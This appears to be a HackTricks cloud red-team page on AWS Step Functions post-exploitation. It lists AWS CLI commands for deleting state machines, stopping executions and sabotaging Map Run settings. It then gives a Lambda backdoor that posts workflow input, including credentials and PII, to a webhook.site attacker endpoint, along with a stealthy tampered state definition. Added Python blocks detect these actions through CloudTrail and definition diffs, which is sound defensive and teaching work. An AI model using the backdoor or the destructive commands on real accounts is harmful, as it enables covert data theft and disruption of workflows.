AWS - Step Functions Post Exploitation
tip
Learn & practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking:
HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Step Functions
For more information about this AWS service, check:
states:RevealSecrets
This permission allows revealing secret data inside an execution. To do so, the inspection level must be set to TRACE and the revealSecrets parameter to true.
states:DeleteStateMachine, states:DeleteStateMachineVersion, states:DeleteStateMachineAlias
An attacker with these permissions would be able to permanently delete state machines, their versions, and aliases. This can disrupt critical workflows, cause data loss, and require significant time to restore and recover the affected state machines. Additionally, it would allow the attacker to cover the tracks of the activities performed, hinder forensic investigation, and potentially cripple operations by removing essential automation processes and state configurations.
note
- Deleting a state machine also deletes all of its associated versions and aliases.
- Deleting a state machine alias does not delete the state machine versions that reference it.
- It is not possible to delete a state machine version that is currently referenced by one or more aliases.
# Delete state machine
aws stepfunctions delete-state-machine --state-machine-arn <value>
# Delete state machine version
aws stepfunctions delete-state-machine-version --state-machine-version-arn <value>
# Delete state machine alias
aws stepfunctions delete-state-machine-alias --state-machine-alias-arn <value>
- Potential Impact: Disruption of critical workflows, data loss, and halting of operations.
states:UpdateMapRun
An attacker with this permission would be able to alter a Map Run's failure configuration and parallel settings, raising or lowering the maximum number of child workflow executions allowed, which directly affects the performance of the service. Additionally, the attacker could tamper with the tolerated failure percentage and count, lowering these values to 0 so that every time an item fails the whole Map Run fails, directly affecting the state machine execution and stalling critical workflows.
aws stepfunctions update-map-run --map-run-arn <value> [--max-concurrency <value>] [--tolerated-failure-percentage <value>] [--tolerated-failure-count <value>]
- Potential Impact: Performance degradation and disruption of critical workflows.
states:StopExecution
An attacker with this permission could stop the execution of any state machine, disrupting running workflows and processes. This could result in incomplete transactions, halted business operations, and potential data corruption.
warning
This action is not supported by express state machines.
aws stepfunctions stop-execution --execution-arn <value> [--error <value>] [--cause <value>]
- Potential Impact: Disruption of running workflows, halting of operations, and potential data corruption.
states:TagResource, states:UntagResource
An attacker could add, modify, or remove tags from Step Functions resources, disrupting your organization's cost allocation, resource tracking, and tag-based access control policies.
aws stepfunctions tag-resource --resource-arn <value> --tags Key=<key>,Value=<value>
aws stepfunctions untag-resource --resource-arn <value> --tag-keys <key>
- Potential Impact: Disruption of cost allocation, resource tracking, and tag-based access control policies.
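Every call in the sections above is recorded by CloudTrail, so the natural defensive counterpart is a triage rule over those records. The following is an added example, not code from the original page: it flags the delete, update, stop and tag calls by name and escalates an UpdateMapRun that forces the tolerated failure settings to 0. The records are constructed samples; the severity labels and the requestParameters key names are assumptions.

```python
# eventName -> (severity, description) for the states.amazonaws.com calls discussed above.
STATES_RULES = {
    "DeleteStateMachine": ("high", "state machine deleted"),
    "DeleteStateMachineVersion": ("high", "state machine version deleted"),
    "DeleteStateMachineAlias": ("high", "state machine alias deleted"),
    "UpdateStateMachine": ("high", "state machine definition or role changed"),
    "StopExecution": ("medium", "running execution stopped"),
    "UpdateMapRun": ("medium", "Map Run concurrency/failure settings changed"),
    "TagResource": ("low", "tags added or changed"),
    "UntagResource": ("low", "tags removed"),
}

def classify(event):
    """Return (severity, message) for one CloudTrail record, or None if it is not of interest."""
    src, name = event.get("eventSource"), event.get("eventName", "")
    params = event.get("requestParameters") or {}
    # Lambda's CloudTrail eventName carries an API version suffix, so match on the prefix.
    if src == "lambda.amazonaws.com" and name.startswith("UpdateFunctionCode"):
        return ("high", f"Lambda code replaced: {params.get('functionName')}")
    if src != "states.amazonaws.com" or name not in STATES_RULES:
        return None
    sev, desc = STATES_RULES[name]
    # Tolerated failures forced to 0 means a single failed item fails the whole Map Run.
    if name == "UpdateMapRun" and 0 in (params.get("toleratedFailurePercentage"),
                                        params.get("toleratedFailureCount")):
        sev, desc = "high", "Map Run tolerated failures forced to 0"
    return (sev, desc)

def triage(events):
    """Return [(severity, eventName, message)] for every matching record, highest severity first."""
    order = {"high": 0, "medium": 1, "low": 2}
    hits = [(r[0], e["eventName"], r[1]) for e in events if (r := classify(e))]
    return sorted(hits, key=lambda h: order[h[0]])

SAMPLE_EVENTS = [  # constructed records, not real CloudTrail output
    {"eventSource": "states.amazonaws.com", "eventName": "DescribeStateMachine", "requestParameters": {}},
    {"eventSource": "states.amazonaws.com", "eventName": "TagResource",
     "requestParameters": {"resourceArn": "arn:aws:states:us-east-1:111122223333:stateMachine:LegitStateMachine"}},
    {"eventSource": "states.amazonaws.com", "eventName": "UpdateMapRun",
     "requestParameters": {"mapRunArn": "arn:aws:states:us-east-1:111122223333:mapRun:Legit/abc", "toleratedFailurePercentage": 0}},
    {"eventSource": "states.amazonaws.com", "eventName": "DeleteStateMachine",
     "requestParameters": {"stateMachineArn": "arn:aws:states:us-east-1:111122223333:stateMachine:LegitStateMachine"}},
    {"eventSource": "lambda.amazonaws.com", "eventName": "UpdateFunctionCode20150331v2",
     "requestParameters": {"functionName": "LegitBusinessLogic"}},
]

if __name__ == "__main__":
    for sev, name, msg in triage(SAMPLE_EVENTS):
        print(f"[{sev.upper()}] {name}: {msg}")
```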
states:UpdateStateMachine, lambda:UpdateFunctionCode
An attacker who gains control of a user or role with the following permissions:
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "AllowUpdateStateMachine",
      "Effect": "Allow",
      "Action": "states:UpdateStateMachine",
      "Resource": "*"
    },
    {
      "Sid": "AllowUpdateFunctionCode",
      "Effect": "Allow",
      "Action": "lambda:UpdateFunctionCode",
      "Resource": "*"
    }
  ]
}
...can perform a high-impact and stealthy post-exploitation attack by combining Lambda backdooring with Step Function logic manipulation.
This scenario assumes that the victim uses AWS Step Functions to orchestrate workflows that process sensitive input, such as credentials, tokens, or PII.
Example victim invocation:
aws stepfunctions start-execution \
--state-machine-arn arn:aws:states:us-east-1:<victim-account-id>:stateMachine:LegitStateMachine \
--input '{"email": "victim@example.com", "password": "hunter2"}' --profile victim
If the Step Function is configured to invoke a Lambda such as LegitBusinessLogic, the attacker can proceed with two kinds of stealthy attack:
Update the Lambda function
The attacker modifies the code of the Lambda function already used by the Step Function (LegitBusinessLogic) so that it covertly exfiltrates the input data.
# send_to_attacker.py
import requests

def lambda_handler(event, context):
    # Forward the whole input event (the workflow's sensitive input) to the attacker's endpoint
    requests.post("https://webhook.site/<attacker-id>/exfil", json=event)
    return {"status": "exfiltrated"}
zip function.zip send_to_attacker.py
aws lambda update-function-code \
--function-name LegitBusinessLogic \
--zip-file fileb://function.zip --profile attacker
Add a malicious state to the Step Function
Alternatively, the attacker can inject an exfiltration state at the start of the workflow by updating the Step Function definition.
{
  "Comment": "Backdoored for Exfiltration",
  "StartAt": "OriginalState",
  "States": {
    "OriginalState": {
      "Type": "Task",
      "Resource": "arn:aws:lambda:us-east-1:<victim-id>:function:LegitBusinessLogic",
      "End": true
    }
  }
}
aws stepfunctions update-state-machine \
--state-machine-arn arn:aws:states:us-east-1:<victim-id>:stateMachine:LegitStateMachine \
--definition file://malicious_state_definition.json --profile attacker
Even more stealthily, the attacker can update the state definition to something like the following, where the victim will not notice any difference:
{
  "Comment": "Backdoored for Exfiltration",
  "StartAt": "ExfiltrateSecrets",
  "States": {
    "ExfiltrateSecrets": {
      "Type": "Task",
      "Resource": "arn:aws:lambda:us-east-1:victim-id:function:SendToAttacker",
      "InputPath": "$",
      "ResultPath": "$.exfil",
      "Next": "OriginalState"
    },
    "OriginalState": {
      "Type": "Task",
      "Resource": "arn:aws:lambda:us-east-1:victim-id:function:LegitBusinessLogic",
      "End": true
    }
  }
}
Victim setup (context for the exploit)
- The Step Function (LegitStateMachine) is used to process sensitive user input.
- It invokes one or more Lambda functions such as LegitBusinessLogic.
Potential Impact:
- Silent exfiltration of sensitive data including secrets, credentials, API keys, and PII.
- No errors or failures are visible in the workflow execution.
- Hard to detect without reviewing the Lambda code or the execution traces.
- Enables long-term persistence if the backdoor remains in the code or in the ASL logic.
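The definition tampering described above is only silent if nobody compares the deployed definition (the definition string returned by aws stepfunctions describe-state-machine) against a known-good copy. The following is an added example, not part of the original page: it flags a changed StartAt, inserted states, repointed Task resources, and any Task resource outside an allow-list, using constructed copies of the definitions above with a sample account id.

```python
# Constructed samples: the known-good definition and the backdoored one shown above.
BASELINE = {
    "StartAt": "OriginalState",
    "States": {
        "OriginalState": {"Type": "Task", "End": True,
                          "Resource": "arn:aws:lambda:us-east-1:111122223333:function:LegitBusinessLogic"},
    },
}
DEPLOYED = {
    "Comment": "Backdoored for Exfiltration",
    "StartAt": "ExfiltrateSecrets",
    "States": {
        "ExfiltrateSecrets": {"Type": "Task", "InputPath": "$", "ResultPath": "$.exfil",
                              "Next": "OriginalState",
                              "Resource": "arn:aws:lambda:us-east-1:111122223333:function:SendToAttacker"},
        "OriginalState": {"Type": "Task", "End": True,
                          "Resource": "arn:aws:lambda:us-east-1:111122223333:function:LegitBusinessLogic"},
    },
}

def task_resources(definition):
    """Every Task Resource ARN in a definition, recursing into Parallel branches and Map sub-workflows."""
    found = set()
    for state in definition.get("States", {}).values():
        if state.get("Type") == "Task":
            found.add(state.get("Resource", ""))
        for sub in state.get("Branches", []) + [state.get("Iterator"), state.get("ItemProcessor")]:
            if sub:
                found |= task_resources(sub)
    return found

def audit_definition(baseline, deployed, allowed_resources):
    """Return findings (strings); an empty list means the deployed definition matches the baseline."""
    findings = []
    base_states, dep_states = baseline.get("States", {}), deployed.get("States", {})
    if deployed.get("StartAt") != baseline.get("StartAt"):
        findings.append(f"StartAt changed: {baseline.get('StartAt')} -> {deployed.get('StartAt')}")
    for name in sorted(set(dep_states) - set(base_states)):
        findings.append(f"new state inserted: {name}")
    for name in sorted(set(dep_states) & set(base_states)):
        if dep_states[name].get("Resource") != base_states[name].get("Resource"):
            findings.append(f"state {name} now invokes {dep_states[name].get('Resource')}")
    for res in sorted(task_resources(deployed) - allowed_resources):
        findings.append(f"Task invokes resource outside allow-list: {res}")
    return findings

if __name__ == "__main__":
    for finding in audit_definition(BASELINE, DEPLOYED, task_resources(BASELINE)):
        print("ALERT:", finding)
```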